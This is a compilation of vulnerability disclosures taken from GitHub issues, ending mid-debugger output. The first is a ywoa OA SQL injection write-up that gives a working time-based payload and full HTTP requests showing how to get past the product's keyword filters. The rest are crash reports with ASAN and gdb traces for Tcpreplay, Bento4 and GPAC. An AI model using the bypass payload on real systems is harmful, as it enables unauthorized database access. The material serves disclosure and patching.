Yimioa v6.1 was discovered to contain a SQL injection vulnerability via the orderbyGET parameter.

**ywoaSQL-Inject-Bypass****Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment

http://partner.yimihome.com/static/index.html#/index/sys\_env

**1, personnel - personnel information - orderbyGET parameter SQL injection**

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

Bypass Payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

**Environment build****Windows build**

Recommended to use Windows build, because idea build is very troublesome, and report a lot of errors, Windows is a one-click deployment  
  
One-click installation, after the installation will prompt the system has expired, go to setup and take a look  
  
Until June 1, but it's okay, here to change the system time can be  
  
  
Login successfully

**Code audit****1\. Personnel - personnel information - orderbyGET parameter SQL injection**

  

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 192.168.0.35:9888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.35:9888/oa/swagger-ui.html
Origin: http://192.168.0.35:9888
Connection: close
Cookie: JSESSIONID=D767FF96902770375A5E31400342B545; skincode=lte; name=admin; pwd=; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 137

page=1&limit=20&realname\_cond=0&realname=test18&sex=&sex\_cond=1&dept=&dept\_cond=0&op=search&moduleCode=personbasic&menuItem=1&mainCode=

**SQL injection Bypass**

The above injection payload is as follows

id+AND+(SELECT+1+FROM+(SELECT(SLEEP(5)))a)

The environment here is from idea, but idea has a lot of error reports, many functions are not available, I changed to Windows one-click deployment  
  
After building it, debug it remotely with idea  
  
When you try to reproduce this vulnerability again, you will be prompted with an XSS interception  
  
  
It was curious at the time why this was XSS intercepted and not SQL intercepted? Look at the code  
  
The specific detection logic is in the filter method in SecurityUtil.java, so let's look at the code logic here  
  
Briefly, the main thing here is to get the values of the request parameters, and then pass them one by one to the following detection logic  
  
Since we just prompted for an XSS attack, we will follow directly into the method antixss to see the specific implementation logic  
Next you will come to Antixss.Java

    src/main/java/com/cloudwebsoft/framework/security/AntiXSS.java
    

  
The antiXSS method is called by passing in the html to be detected and a true  
  
Follow directly in to see  
  
Check the \_antiXSS method, where the content is passed in is the content to be detected  
  
Here is the specific detection logic, but I'm only looking at the stripScriptTag method here, because it is the content inside this method that is detected, and our focus is only on what parameters are detected  
  
Mainly by means of regularity and case-insensitive because of CASE_INSENSITIVE  
  
Pull the following when you can see, in fact, and or sleep is filtered, create a new test class, and adjust it to know  
  
Remove AND  
  
The statement is normal, put back and remove sleep, the statement is normal, so since this is the case, replace and with &&, you can  
  
statement returns normally, then after returning here  
  
Returning to SecurityUtil.java, it will enter the logic of SQL injection, following the isValidSqlParam method  
  
Follow the sql_inj method  
  
We have already bypassed the detection of and and need to bypass the code logic in the second box  
  
The main logic here is to separate inj\_str using |, which will generate a list to inj\_stra\[\], and then iterate through the list, each loop will use the indexOf method to determine whether the value in inj\_stra\[i\] is in str, that is, if indexOf returns > 0 value exists, and vice versa, it does not exist, here you can also write a class tuned  
  
  
In the sixth loop, which is when select is detected, then it is obvious that you need to bypass select  
Here I was going to try to use

&& extractvalue(1,concat('~',database()))

Unfortunately, '~' will be detected as XSS, so this method does not work  
  
The && here needs to be converted to url encoding, otherwise this request will report 400  
  
So we can only think of ways to select this keyword, here is a bypass of the payload

id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)

  
Tips: Here just by looking at the screenshot you may think that you can bypass it with SELECT capitalization, but in fact it will be converted to lowercase before calling the sql_inj method  
  
So there is no way to capitalize to bypass

POST /oa/visual/moduleList.do?op=&code=personbasic&orderBy=id+%26%26+(/\*!%53eLEct\*/+1+FROM+(/\*!%53eLEct\*/(sleep(5)))a)&sort=desc&unitCode=& HTTP/1.1
Host: 172.16.140.176:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=A4CD4E79F3B246F5268600DDF907FA54; skincode=lte; name=admin; pwd=p5Bx7jxXNGCCEsQLv/rG4w==; cwbbs.auth=LkPkBkEkAkNmJmHmHhEmNmHmHmPmBmPmPmOhOhKmMmMhJlDlDiGlAlMlCiDiNlIiJlIlMlMlPlNl
Content-Length: 15

page=2&limit=20

**Function implementation entrance**

  
  
First will get the get parameter code, if the code parameter is empty, then get the Get parameter moduleCode and assign it to code, if there is no moduleCode in the get parameter, then get the formCode and copy it to code, here the code parameter passed in is personbasic  
  
Continue to the next page  
  
Here is the OA developer's own implementation of the SQLBuilder class  
  
  
Follow this method  
  
Follow such as getModuleListSqlAndUrlStr method, then a sql str will be returned, continue down the line is the place that causes SQL injection  
  
Follow up this listResult method  
  
The statements will then be spelled out in the middle  
  
The executeQuery statement is then executed  
  
The difference between the above and the SQL statement is that one is the count spliced in and the other is the original passed in  
  
This is followed by a return, which is executed here with a 5-second wait, so it causes an injection

CVE-2022-36605: ywoa SQL inject Bypass and Analysis of the article · Issue #24 · cloudwebsoft/ywoa

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get\_ipv6\_next. Different from #716 (The crash point is in line 322, ntohs(eth_hdr->ether_type);), this bug is triggered in line 344 (pktdata[l2_net_off] >> 4).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37048: [Bug] heap-overflow in get.c:344 · Issue #735 · appneta/tcpreplay

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug in get\_ipv6\_next. Different from #718 (The crash point is in line 679, *((int*)((u_char *)exthdr + len))), this bug is triggered in line 713 (*((int*)((u_char *)exthdr + len)) > maxlen).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
**POC**  
poc.zip

CVE-2022-37047: [Bug] heap-overflow in get.c:713 · Issue #734 · appneta/tcpreplay

The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get.c:150. This bug is different from #719 that crashes in get.c:118.

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37049: [Bug] heap-overflow in get.c:150 · Issue #736 · appneta/tcpreplay

An issue in AP4_SgpdAtom::AP4_SgpdAtom() of Bento4-1.6.0-639 allows attackers to cause a Denial of Service (DoS) via a crafted mp4 input.

**Vulnerability description**

**version:** Bento4-1.6.0-639  
**command:** ./mp42aac $POC /dev/null  
**Download:** poc

Here is the trace reported by ASAN:

    $ mp42aac poc /dev/null
    
    AddressSanitizer: Out of memory. The process has exhausted 65536MB for size class 48.
    =================================================================
    ==29843==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x18 bytes
        #0 0x7ffff769b947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947)
        #1 0x555555911f52 in AP4_List<AP4_DataBuffer>::Add(AP4_DataBuffer*) /path_to_Bento4/Source/C++/Core/Ap4List.h:160
        #2 0x5555559114bd in AP4_SgpdAtom::AP4_SgpdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:111
        #3 0x555555910da4 in AP4_SgpdAtom::Create(unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:54
        #4 0x55555589399c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:729
        #5 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
        #6 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #7 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #8 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #9 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796
        #10 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
        #11 0x5555558c7b47 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84
        #12 0x5555558c768b in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50
        #13 0x555555892ccd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:560
        #14 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
        #15 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #16 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #17 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #18 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796
        #19 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
        #20 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #21 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #22 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #23 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796
        #24 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
        #25 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194
        #26 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139
        #27 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88
        #28 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796
        #29 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233
    
    ==29843==HINT: if you don't care about these errors you may set allocator_may_return_null=1
    SUMMARY: AddressSanitizer: out-of-memory (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) in operator new(unsigned long)
    ==29843==ABORTING
    

**Vulnerability analysis**

AP4\_UI32 entry\_count = 0;

AP4\_Result result = stream.ReadUI32(entry\_count);

if (AP4\_FAILED(result)) return;

bytes\_available -= 4;

// read all entries

for (unsigned int i=0; i<entry\_count; i++) {

AP4\_UI32 description\_length = m\_DefaultLength;

if (m\_Version == 0) {

// entry size unknown, read the whole thing

description\_length = bytes\_available;

} else {

if (m\_DefaultLength == 0) {

description\_length = stream.ReadUI32(description\_length);

}

}

if (description\_length <= bytes\_available) {

AP4\_DataBuffer\* payload = new AP4\_DataBuffer();

if (description\_length) {

payload->SetDataSize(description\_length);

stream.Read(payload->UseData(), description\_length);

}

m\_Entries.Add(payload);

}

}

}

    pwndbg> p entry_count
    $1 = 4278190081
    pwndbg> p m_DefaultLength
    $2 = 20
    pwndbg> p m_Version
    $3 = 1 '\001'
    pwndbg> p bytes_available
    $4 = 20
    

The possible cause of this issue is that a crafted input can set entry_count to a large value (4,278,190,081) in line 90. Such a long loop (line 95-114) will allocate a lot of memory in line 106 and line 111, which eventually exhausts the memory. Since the return value of stream.Read is not checked in line 109, the loop will not terminate at the end of the input file.

CVE-2022-35165: Possible memory exhuastion in AP4_SgpdAtom::AP4_SgpdAtom(). The process has exhausted 65536MB memory. · Issue #712 · axiomatic-systems/Bento4

A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/  
**Description**  
A heap-buffer-overflow has occurred in function gf\_isom\_dovi\_config\_get of isomedia/avc\_ext.c:2490 when running program MP4Box,this can reproduce on the lattest commit.

**version info**

    fuzz@ubuntu:~/gpac2.1/gpac/bin/gcc$ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    
    

**crash command**

 ./MP4Box -info poc1

**crash output**

    [iso file] Unknown box type 00000200 in parent stsd
    # Movie Info - 1 track - TimeScale 1000
    Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879)
    Fragmented: no
    Major Brand mp4@ - version 0 - compatible brands: mp42 mp41 isom iso2
    Created: GMT Thu Apr 26 09:02:13 2012
    
    
    # Track 1 Info - ID 1 - TimeScale 3000
    Media Duration 00:00:10.000  (recomputed 4 Days, 14:43:47.879)
    Track flags: Enabled In Movie In Preview
    Media Info: Language "Undetermined (und)" - Type "vide:00000200" - 300 samples
    Visual Sample Entry Info: width=320 height=240 (depth=24 bits)
    Visual Track layout: x=0 y=0 width=320 height=240
    =================================================================
    ==2235126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000130 at pc 0x7ff2a69b3bc0 bp 0x7fff43da89f0 sp 0x7fff43da89e0
    READ of size 8 at 0x60f000000130 thread T0
        #0 0x7ff2a69b3bbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490
        #1 0x56165102107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862
        #2 0x56165102ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994
        #3 0x561651002ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367
        #4 0x7ff2a4071082 in __libc_start_main ../csu/libc-start.c:308
        #5 0x561650fd7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd)
    
    Address 0x60f000000130 is a wild pointer.
    SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get
    Shadow bytes around the buggy address:
      0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa
    =>0x0c1e7fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2235126==ABORTING
    

**source code**

    2481 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex)
    2482 {
    2483 	GF_TrackBox* trak;
    2484 	GF_MPEGVisualSampleEntryBox *entry;
    2485 	trak = gf_isom_get_track_from_file(the_file, trackNumber);
    2486 	if (!trak || !trak->Media || !DescriptionIndex) return NULL;
    2487 	entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1);
    2488	if (!entry) return NULL;
    2489 	if (entry->internal_type != GF_ISOM_SAMPLE_ENTRY_VIDEO) return NULL;
    2490 	if (!entry->dovi_config) return NULL;          /**here**/
    2491 	return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig);
    2492 }
    
    

**sample poc:**

poc1.zip

ps: it is similar with the issue which occured in older gpac version ( #1846) . The bug was not patched . It still occured in the newest version.

CVE-2022-36191: heap-buffer-overflow in function gf_isom_dovi_config_get  · Issue #2218 · gpac/gpac

A Null Pointer dereference vulnerability exists in GPAC 2.1-DEV-revUNKNOWN-master via the function gf_filter_pid_set_property_full () at filter_core/filter_pid.c:5250,which causes a Denial of Service (DoS). This vulnerability was fixed in commit b43f9d1.

Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!

*   I looked for a similar issue and couldn't find any.
*   I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
*   I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop\_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95

Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/

**Description:**  
\`A crash happened on MP4Box(GPAC version 2.1-DEV-revUNKNOWN-master) due to a null pointer dereference vulnerability in gf\_filter\_pid\_set\_property\_full function (filter\_core/filter\_pid.c:5250) .

\`  
**MP4Box version**

    ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
    	GPAC Filters: https://doi.org/10.1145/3339825.3394929
    	GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**poc**  
poc.zip

**command**  
./MP4Box -info poc

**crash output**

    [AVC|H264] Warning: Error parsing NAL unit
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    

**gdb output**

    pwndbg> r
    Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    [AVC|H264] Warning: Error parsing NAL unit
    filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid'
    [Inferior 1 (process 2239153) exited with code 01]
    pwndbg> b filter_pid.c:5250
    Breakpoint 1 at 0x7ffff4b829f6: filter_pid.c:5250. (6 locations)
    pwndbg> r
    Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc
    [Thread debugging using libthread_db enabled]
    Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
    
    Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301
    5301		return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE);
    LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
    ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     RAX  0x0
     RBX  0x7ffffffe8f50 ◂— 0x41b58ab3
     RCX  0xfffffffd22a ◂— 0x0
     RDX  0x7ffffffe9150 ◂— 0x2
     RDI  0x613000000040 ◂— 0x613000000040 /* '@' */
     RSI  0x504d5354
     R8   0x0
     R9   0x7ffff58cb4f0 (global_log_tools+496) ◂— 0x2
     R10  0x7ffff24ab3f1 ◂— 'gf_filter_pid_set_property'
     R11  0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 
     R12  0x613000000040 ◂— 0x613000000040 /* '@' */
     R13  0x7ffffffe9150 ◂— 0x2
     R14  0x504d5354
     R15  0xfffffffd1ea ◂— 0x0
     RBP  0x7ffffffe9060 —▸ 0x7ffffffe9380 —▸ 0x7ffffffea0d0 —▸ 0x7ffffffea170 —▸ 0x7ffffffea280 ◂— ...
     RSP  0x7ffffffe8f30 ◂— 0x0
     RIP  0x7ffff4b841c6 (gf_filter_pid_set_property+182) ◂— test   r12, r12
    ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
     ► 0x7ffff4b841c6 <gf_filter_pid_set_property+182>    test   r12, r12
       0x7ffff4b841c9 <gf_filter_pid_set_property+185>    je     gf_filter_pid_set_property+1477                <gf_filter_pid_set_property+1477>
     
       0x7ffff4b841cf <gf_filter_pid_set_property+191>    test   r12b, 7
       0x7ffff4b841d3 <gf_filter_pid_set_property+195>    jne    gf_filter_pid_set_property+1477                <gf_filter_pid_set_property+1477>
     
       0x7ffff4b841d9 <gf_filter_pid_set_property+201>    mov    rax, r12
       0x7ffff4b841dc <gf_filter_pid_set_property+204>    shr    rax, 3
       0x7ffff4b841e0 <gf_filter_pid_set_property+208>    cmp    byte ptr [rax + 0x7fff8000], 0
